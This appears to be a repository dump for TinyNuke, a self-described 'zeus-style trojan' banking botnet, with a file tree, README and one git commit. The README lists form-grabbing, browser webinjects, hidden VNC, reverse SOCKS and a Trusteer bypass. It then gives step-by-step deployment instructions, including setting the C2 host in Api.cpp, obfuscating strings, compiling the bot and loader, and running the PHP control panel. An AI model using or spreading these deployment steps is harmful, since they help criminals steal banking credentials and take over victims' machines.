======================: FILES :======================
TinyNuke
├── AiJson
│   ├── AiJson.cpp
│   ├── AiJson.h
│   ├── AiList.cpp
│   ├── AiList.h
│   ├── AiStrAppender.cpp
│   └── AiStrAppender.h
├── Api.cpp
├── Api.h
├── AutoEncrypt
│   ├── AutoEncrypt
│   │   ├── App.config
│   │   ├── AutoEncrypt.csproj
│   │   ├── AutoEncrypt.csproj.user
│   │   ├── Program.cs
│   │   └── Properties
│   │       └── AssemblyInfo.cs
│   └── AutoEncrypt.sln
├── AutoEncrypt.exe
├── Bot
│   ├── Bot.cpp
│   ├── Bot.h
│   ├── Bot.vcxproj
│   ├── Bot.vcxproj.filters
│   ├── Bot.vcxproj.user
│   ├── BrowserUtils.cpp
│   ├── BrowserUtils.h
│   ├── Explorer.cpp
│   ├── Explorer.h
│   ├── FirefoxChrome.cpp
│   ├── FirefoxChrome.h
│   ├── HiddenDesktop.cpp
│   ├── HiddenDesktop.h
│   ├── IE.cpp
│   ├── IE.h
│   ├── Main.cpp
│   ├── Socks.cpp
│   ├── Socks.h
│   ├── WebInjects.cpp
│   └── WebInjects.h
├── Common.h
├── CreateDllInjectPayload
│   └── CreateDllInjectPayload.cpp
├── enc.cmd
├── FirefoxChrome.cpp
├── HiddenDesktop
│   ├── HiddenDesktop.sln
│   ├── readme.txt
│   └── Server
│       ├── Common.h
│       ├── ControlWindow.cpp
│       ├── ControlWindow.h
│       ├── Main.cpp
│       ├── Server.cpp
│       ├── Server.h
│       ├── Server.vcxproj
│       ├── Server.vcxproj.filters
│       └── Server.vcxproj.user
├── HTTP.cpp
├── HTTP.h
├── IE.cpp
├── Inject.cpp
├── Inject.h
├── Loader
│   ├── Loader.vcxproj
│   ├── Loader.vcxproj.filters
│   ├── Loader.vcxproj.user
│   └── Main.cpp
├── MinHook
│   ├── include
│   │   └── MinHook.h
│   └── src
│       ├── buffer.c
│       ├── buffer.h
│       ├── hde
│       │   ├── hde32.c
│       │   ├── hde32.h
│       │   ├── hde64.c
│       │   ├── hde64.h
│       │   ├── pstdint.h
│       │   ├── table32.h
│       │   └── table64.h
│       ├── hook.c
│       ├── trampoline.c
│       └── trampoline.h
├── panel
│   ├── bots.php
│   ├── client.php
│   ├── commands.php
│   ├── db.sql
│   ├── geoip.dat
│   ├── inc
│   │   ├── cc.php
│   │   ├── common.php
│   │   ├── const.php
│   │   ├── db.php
│   │   ├── geoip.php
│   │   ├── ui.php
│   │   └── utils.php
│   ├── index.php
│   ├── login.php
│   ├── pinned_hosts.php
│   ├── private
│   │   └── injects.json
│   ├── reports.php
│   ├── settings_data.php
│   ├── settings.php
│   └── style
│       ├── back.jpg
│       └── style.css
├── Panel.cpp
├── Panel.h
├── README.md
├── SocksServer
│   ├── SocksServer
│   │   ├── main.cpp
│   │   ├── Server.cpp
│   │   ├── Server.h
│   │   ├── SocksServer.vcxproj
│   │   ├── SocksServer.vcxproj.filters
│   │   └── SocksServer.vcxproj.user
│   └── SocksServer.sln
├── TinyNuke.sln
├── Utils.cpp
├── Utils.h
└── wow64ext
    ├── CMemPtr.h
    ├── internal.h
    ├── resource.h
    ├── wow64ext.cpp
    ├── wow64ext.dll
    ├── wow64ext.h
    └── wow64ext.lib

20 directories, 113 files
======================: README CONTENT :======================
#TinyNuke Botnet

* * *


	This repository contains the source code of TinyNuke which is a zeus-style trojan.
    Coded on C++ (Bot, Injectors, Servers, API, etc.) and PHP (Control Panel)

> Note: If you have any questions - you can contact me at bakahadoken@protonmail.com by EMail or at www0rm@cock.li on Jabber (XMPP)

Trusteer Rapport News:
======================

In a tabloid-like article (https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/)
IBM claims I never bypassed Trusteer without sources or proof while spewing lies about me.
Here is a little video to counter that statement: https://www.youtube.com/watch?v=co7T9CHxYZw
I had offered to help trusteer try to fix this problem weeks ago but they didn't seem to want any help
as I was stuck with tech support more centered for customers of their software then technical stuff.

You can see how easy it is to beat trusteer which makes 147m USD a year here:
https://github.com/HadokenCode/TinyNuke/blob/master/Utils.cpp#L524

Disclaimor:
===========

#####Some articles are claiming that I am a certain individual selling this bot on russian deep-web forums

###I am never infected anything with this project nor did I sell it or try to

Main Features:
==============

 - Formgrabber and Webinjects for Firefox, Internet Explorer and Chrome. Can inject x86 as well as x64 browsers.
 - Reverse SOCKS 4
 - HVNC like Hidden Desktop
 - Trusteer Bypass
 - 32Kb binary with obfuscated strings 20Kb without

Installation:
=============

 - [ ] To install the panel dump the db.sql file then login with the default panel credentials admin:pass and finally navigate to settings.php

		Panel does not support php running under CGI/FastCGI. You also need at least php version 5.4

 - [ ] Open TinyNuke.sln and provide your server Api.cpp like this:

   	Strs::host[0] = ENC_STR_A"127.0.0.1"END_ENC_STR;
   	Strs::host[1] = ENC_STR_A"backup-server"END_ENC_STR;
   	Strs::host[2] = 0;

 - [ ] To obfuscate strings between the ENC_STR_A and END_ENC_STR, backup Api.cpp then use the AutoEncrypt project, a binary is located in the root directory

 - [ ] Compile the Bot project for the x64 and x86 platforms and upload the binaries to the panel in the settings page

 - [ ] Upload your webinject file, format can be seen in private/injects.json in the panel folder if you have no WebInjects provide an empty JSON object "{}"

 - [ ] Compile the Loader project to get your PE file

		Usage and additional info can be found within the code.
        (HiddenDesktop/VNC Server Folder is HiddenDesktop
        Reverse SOCKS 4 Server is SocksServer)

Known Bugs:
===========

 - The "Top Hosts" feature was hacked together and should either be fixed or more probably removed.
====================== GIT HISTORY: ======================
fb96e8d HEAD@{0}: clone: from https://github.com/Sts0mrg0/TinyNuke
commit fb96e8df518a16c172e91f6330e8aa0a4887b744
Author: hadokenCode <www0rm@cock.li>
Date:   Thu Jul 13 06:17:04 2017 +0300

    TinyNuke is works now
